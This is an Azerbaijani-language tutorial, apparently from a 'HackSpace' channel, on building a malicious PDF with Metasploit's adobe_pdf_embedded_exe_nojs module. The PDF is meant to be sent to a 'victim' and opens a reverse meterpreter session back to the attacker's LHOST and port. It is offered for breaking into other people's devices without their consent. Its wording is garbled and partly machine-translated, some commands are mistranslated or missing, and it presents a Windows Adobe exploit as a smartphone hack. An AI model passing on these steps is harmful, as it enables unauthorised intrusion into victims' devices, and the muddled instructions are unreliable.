PDF faylı vasitəsilə smartfonu necə sındırmaq olar
Salam Deyerli HackSpace İzleyicileri! Bu gün biz bir neçə dəqiqə ərzində hətta kompüteriniz olmadan başqasının telefonuna nece sıza bileceyinizi başa salacayiq
Bizə lazım olacaq: 1. Termux proqramı (onu Play Store və ya F-Droid-dən yükləyin). 2. Termux-da Metasploit Framework quraşdırın. 3. Termux xarici yaddaşdan istifadə etməyi bacarmalıdır (bunun üçün əmri daxil edin: termux-setup-storage).
Metasploit Konsollarının işə salınması Əgər smartfonunuzdan istifadə edirsinizsə, Termux-u açın və ya Linux kompüterindən istifadə edirsinizsə, terminalı açın. Metasploit konsolunu açmaq üçün aşağıdakı əmri daxil edin
PDF yaratmaq Aşağıdakı əmri daxil edin: istifadə exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs Sonra Localhost-u konfiqurasiya etməlisiniz. Bunun üçün sizə IP ünvanınız lazımdır, onun növünü yoxlamaq üçün termux-da yeni sessiya pəncərəsinə və ya başqa terminal pəncərəsinə daxil olun: ifconfig İndi metasploit konsolunuza gedin və IP-ni aşağıdakı kimi yazın:
set LHOST 192.168.0.0 Yuxarıdakı əmrdəki IP ünvanını öz IP ünvanınızla əvəz edin İndi portu konfiqurasiya etmək vaxtıdır. Bunu etmək üçün aşağıdakı əmri daxil edin:
LPORT 4444 təyin et Siz 4564, 8080 və s. kimi istənilən portdan istifadə edə bilərsiniz. Sonra, aşağıdakı əmrdən istifadə edərək PDF-imizi yaradacağıq:
MyDocument.pdf fayl adını təyin et Siz istədiyiniz addan istifadə edə bilərsiniz. Sadəcə onu MyDocument ilə əvəz edin. Adının sonuna .pdf əlavə etməyi unutmayın. Komandanı daxil etməklə yaratma prosesini bitirin: exploit
İndi, bir saniyə ərzində, PDF-nin yaradıldığını bildirən bir mesaj görünəcək. Bu faylı qurbanınıza göndərmək qalır. O, onu açdıqdan sonra metasploit seansı alacaqsınız.
İstifadəsi Əvvəlcə yazaraq metasploit konsolunu açın
2-ci addımda yuxarıdakı kimi eyni IP ünvanını və portu daxil etdiyinizə əmin olun. Bir az vaxt aparacaq, bundan sonra siz meterpreter seansı alacaqsınız.